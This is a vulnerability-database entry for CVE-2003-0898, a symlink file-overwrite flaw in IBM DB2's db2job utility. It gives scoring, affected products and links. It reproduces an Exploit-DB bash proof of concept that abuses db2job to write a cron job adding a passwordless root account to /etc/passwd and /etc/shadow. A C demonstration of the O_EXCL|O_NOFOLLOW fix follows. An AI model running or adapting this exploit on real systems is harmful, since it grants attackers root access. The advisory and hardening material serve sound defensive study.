CVE-2003-0898
CVSS4.6
Published: 2003-11-17 00:00:00
Revised: 2016-10-17 22:38:14

[Original] IBM DB2 7.2 before FixPak 10a, and earlier versions including 7.1, allows local users to overwrite arbitrary files and gain privileges via a symlink attack on (1) db2job and (2) db2job2.


[CNNVD] FixPak arbitrary file overwrite vulnerability (CNNVD-200311-067)

IBM DB2 7.2 versions before FixPak 10a, and earlier versions including 7.1, are affected. A local user can overwrite arbitrary files via a symlink attack on (1) db2job and (2) db2job2.

- CVSS (base score)

CVSS score: 4.6 [Medium (MEDIUM)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:ibm:db2_universal_database:7.1::linux
cpe:/a:ibm:db2_universal_database:8.0::linux  IBM DB2 Universal Database 8.0 linux

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0898
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0898
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-067
(official data source) CNNVD

- Other links and resources

ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv7/FP10a_U495172/FixpakReadme.txt
(UNKNOWN)  CONFIRM  ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv7/FP10a_U495172/FixpakReadme.txt
http://marc.info/?l=bugtraq&m=106010332721672&w=2
(UNKNOWN)  BUGTRAQ  20030805 Local Vulnerability in IBM DB2 7.1 db2job binary

- Vulnerability information

FixPak arbitrary file overwrite vulnerability
Medium  Unknown
2003-11-17 00:00:00 2005-10-20 00:00:00
Local
IBM DB2 7.2 versions before FixPak 10a, and earlier versions including 7.1, are affected. A local user can overwrite arbitrary files via a symlink attack on (1) db2job and (2) db2job2.

- Advisories and patches

        

- Vulnerability information (22988)

IBM DB2 db2job File Overwrite Vulnerability (EDBID:22988)
unix local
2003-08-05 Verified
0 Juan Manuel Pascual Escribá
N/A
source: http://www.securityfocus.com/bid/8344/info

IBM's DB2 database ships with a utility called db2job, installed with permissions 4550 and owned by root.db2asgrp. 

It has been reported that db2job writes to a number of files with root privileges. The files written to are created with 0770 permissions (owner, group writeable) and are owned by root.db2asgrp. If a symbolic link is written to, the file pointed to will be overwritten and given these permissions. This can be exploited by local attackers with execute privileges to gain root access by writing malicious data to sensitive files (such as /etc/passwd, /etc/shadow) that have been overwritten.

It should be noted, however, that db2job is allegedly not world-executable by default. The two members of group db2asgrp, db2as and db2inst1, are the only users besides root that would normally have execute access. If the attacker can run commands or gain the access level of those accounts, they may further elevate their access level through exploitation of this vulnerability.

#!/bin/bash

DB2JOB=/home/db2as/sqllib/adm/db2job
CRONFILE=/etc/cron.hourly/pakito
USER=pakito

unset DB2INSTANCE
export DB2DIR=./trash

if [ -d $DB2DIR ]; then
echo Trash directory already created
else
mkdir $DB2DIR
fi

cd $DB2DIR
if [ -f ./0_1.out ]; then
echo Link Already Created
else
ln -s $CRONFILE ./0_1.out
fi

$DB2JOB


echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo " must wait until cron execute $CRONFILE and then exec su pakito"		
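The defensive counterpart to the db2job behaviour described above, as an added example that is not code from the advisory, from IBM or from the exploit author: a small C program contrasting a privileged writer that creates its output file with a plain open(O_CREAT|O_TRUNC) and the advisory's 0770 mode (which follows a pre-planted symlink and clobbers whatever it points at) against one that uses O_CREAT|O_EXCL|O_NOFOLLOW, which the kernel refuses with EEXIST when the name is a symlink. The temporary directory, the file names and the "protected.conf" target are constructed for the demonstration; the hardened pattern is the generic fix for this vulnerability class, not IBM's FixPak change.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE   /* mkdtemp(), symlink(), O_NOFOLLOW on glibc */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* The pattern the advisory describes: a privileged tool creating its output
   with O_CREAT|O_TRUNC and a group-writable mode. open() follows a symlink
   sitting at `path`, so whatever the link points at is truncated and
   rewritten. Returns 0 on success, -1 on failure. */
static int naive_write(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0770);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened writer. O_EXCL makes the open fail if the name already exists,
   and POSIX specifies that a symlink at the final component counts as
   existing (errno EEXIST) no matter where it points; O_NOFOLLOW additionally
   rejects a symlink even without O_EXCL. The mode no longer grants group
   write. Returns 0 on success, otherwise the errno that stopped it. */
static int safe_write(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return errno;
    ssize_t n = write(fd, data, strlen(data));
    int rc = n < 0 ? errno : 0;
    close(fd);
    return rc;
}

/* Reads a short file into buf (NUL-terminated). Returns 0 on success. */
static int read_small(const char *path, char *buf, size_t cap)
{
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    size_t n = fread(buf, 1, cap - 1, f);
    fclose(f);
    buf[n] = '\0';
    return 0;
}

struct demo_result {
    int naive_rc;         /* 0 when the naive open wrote through the link */
    int target_clobbered; /* 1 when protected.conf now holds the planted data */
    int safe_err;         /* errno from the hardened open on the link (EEXIST) */
    int safe_fresh_rc;    /* 0 when the hardened open on a new name succeeded */
};

/* Builds a constructed scenario in a fresh temp directory: a file worth
   protecting, plus a symlink planted under the name the "privileged tool"
   expects to create (0_1.out, the name used in the exploit above). */
struct demo_result run_demo(void)
{
    struct demo_result r = { -1, 0, 0, -1 };
    char dir[] = "/tmp/symlink-demo-XXXXXX";   /* constructed scratch dir */
    if (!mkdtemp(dir))
        return r;

    char target[256], link[256], fresh[256], buf[64];
    snprintf(target, sizeof target, "%s/protected.conf", dir);
    snprintf(link, sizeof link, "%s/0_1.out", dir);
    snprintf(fresh, sizeof fresh, "%s/0_2.out", dir);

    (void)naive_write(target, "original contents\n"); /* the file to protect */
    (void)symlink(target, link);                       /* the planted link   */

    r.naive_rc = naive_write(link, "planted data\n");
    if (read_small(target, buf, sizeof buf) == 0)
        r.target_clobbered = strcmp(buf, "planted data\n") == 0;

    r.safe_err = safe_write(link, "never written\n");
    r.safe_fresh_rc = safe_write(fresh, "only a brand-new, non-link name\n");

    unlink(fresh); unlink(link); unlink(target); rmdir(dir);
    return r;
}

int main(void)
{
    struct demo_result r = run_demo();
    printf("naive open through symlink: rc=%d, target clobbered=%d\n",
           r.naive_rc, r.target_clobbered);
    printf("hardened open on symlink: errno=%d (%s)\n",
           r.safe_err, strerror(r.safe_err));
    printf("hardened open on fresh name: rc=%d\n", r.safe_fresh_rc);
    return 0;
}
```

O_EXCL only helps when the writer can treat an already-existing name as an error rather than something to overwrite, which is the right behaviour for a job-output file. Independently of the open flags, the directory the privileged tool writes into should not be writable by the unprivileged group (in the exploit above it is the caller's own working directory), so that no name can be planted there in the first place.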

- Vulnerability information

9492
IBM DB2 db2job Symlink Privilege Escalation
Local Access Required Race Condition

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-08-05 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete